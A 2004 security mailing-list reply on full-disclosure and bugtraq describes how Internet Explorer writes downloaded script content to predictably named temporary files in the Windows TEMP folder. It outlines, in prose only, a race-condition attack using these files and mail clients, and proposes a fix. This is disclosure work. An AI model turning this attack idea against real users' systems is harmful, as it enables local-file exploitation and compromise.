Date: Fri, 9 Jul 2004 18:14:42 +0400
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: Jelmer <jkuperus@...net.nl>
Cc: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com,
   Secure@...rosoft.com
Subject: Another IE trick (Re: IE sucks : sun java virtual machine insecure tmp file creation)

Dear Jelmer,

There  is  another  nearly  same,  but  more  dangerous  attack scenario
(because   it   works   under   default  XP  installation):  if  [script
src="bla-bla-bla"]  tag  is  used on HTML page IE (at least 5.5 and 6.0)
creates  temporary  HTML  file  in  TEMP  folder  (instead of "Temporary
Internet  Files")  with  content  of  the script file. After script file
download   completes   it's   removed.  Name  of  the  file  looks  like
Script_15d87001.html. Digits are constantly increasing, so it looks like
a  kind  of  timestamp  with  no  randomness at all. Because remote file
download process is controlled by remote side (and it's trivial for HTTP
server  to "hang" connection after actual data is sent) it's possible to
exploit it in a same way.

Exploitation  of  "Temp" folder content may be really interesting issue.
You  can  also  try  to exploit mail agent by sending large message with
script in the beginning to user while he is browsing your site and catch
race  condition while message exists in Temp folder. Multiple MUAs store
temporary files in Temp with predictable names.

Best  solution  for  MS  in this case - to have "Temp" folder related to
Internet zone like "Temporary Internet Files" is.

But I still believe that having file in predictable location on your own
host is not a crime. And _real_ bug is one pointed by Http-equiv.

--
~/ZARAZA
Если даже вы получите какое-нибудь письмо, вы все равно не сумеете его прочитать. (Твен)